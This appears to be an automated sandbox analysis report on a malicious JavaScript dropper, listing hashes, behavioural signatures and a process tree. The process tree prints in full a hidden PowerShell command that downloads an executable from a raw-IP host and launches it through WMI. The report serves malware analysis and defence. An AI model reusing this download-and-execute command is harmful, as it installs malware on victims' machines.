Analysis
-
max time kernel
135s -
max time network
104s -
platform
windows10-2004_x64 -
resource
win10v2004-20240508-en -
resource tags
arch:x64arch:x86image:win10v2004-20240508-enlocale:en-usos:windows10-2004-x64system -
submitted
22-05-2024 23:13
Static task
static1
Behavioral task
behavioral1
Sample
68f65871f36e2d1053fdc94c325c666e_JaffaCakes118.js
Resource
win7-20240221-en
Behavioral task
behavioral2
Sample
68f65871f36e2d1053fdc94c325c666e_JaffaCakes118.js
Resource
win10v2004-20240508-en
General
-
Target
68f65871f36e2d1053fdc94c325c666e_JaffaCakes118.js
-
Size
31KB
-
MD5
68f65871f36e2d1053fdc94c325c666e
-
SHA1
b8e4fcdd25cac949cfb8e5af10c20f0d9a819bc2
-
SHA256
8adf64000dda34334dd18581022e68206b9b4f2871700f9e8b0176f9dfc2cecb
-
SHA512
df9b28fbe881970bd5746360c4e77ec85f317899891aacc5adda6126beee91fe0117d1d9d21a0621393f361843f755f8199737566dee5b2ea22d3e9b160b63d2
-
SSDEEP
768:+e2mLWvpMQH8b/KN13u/HPPBD2IWNpHOjyefFYRtiQE0rFwT3uBLeXEJ:+e2TBMQH8omqBF
Malware Config
Extracted
http://185.198.57.172/faazdfdsxm.exe?XVMtv
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 6 3640 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
Processes:
wscript.exedescription ioc process Key value queried \REGISTRY\USER\S-1-5-21-2804150937-2146708401-419095071-1000\Control Panel\International\Geo\Nation wscript.exe -
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
Processes:
powershell.exepid process 3640 powershell.exe 3640 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3640 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
wscript.execmd.exedescription pid process target process PID 3496 wrote to memory of 2672 3496 wscript.exe cmd.exe PID 3496 wrote to memory of 2672 3496 wscript.exe cmd.exe PID 2672 wrote to memory of 3640 2672 cmd.exe powershell.exe PID 2672 wrote to memory of 3640 2672 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\68f65871f36e2d1053fdc94c325c666e_JaffaCakes118.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3496 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c powershell.exe -w hidden -noprofile -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://185.198.57.172/faazdfdsxm.exe?XVMtv','%tEmp%xiL95.ExE'); Invoke-WmiMetHoD -CLass WIN32_ProcESS -NaME CReatE -ArguMeNtLISt '%TeMP%xiL95.EXE'2⤵
- Suspicious use of WriteProcessMemory
PID:2672 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -w hidden -noprofile -executionpolicy bypass (new-object system.net.webclient).downloadfile('http://185.198.57.172/faazdfdsxm.exe?XVMtv','C:\Users\Admin\AppData\Local\TempxiL95.ExE'); Invoke-WmiMetHoD -CLass WIN32_ProcESS -NaME CReatE -ArguMeNtLISt 'C:\Users\Admin\AppData\Local\TempxiL95.EXE'3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3640
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82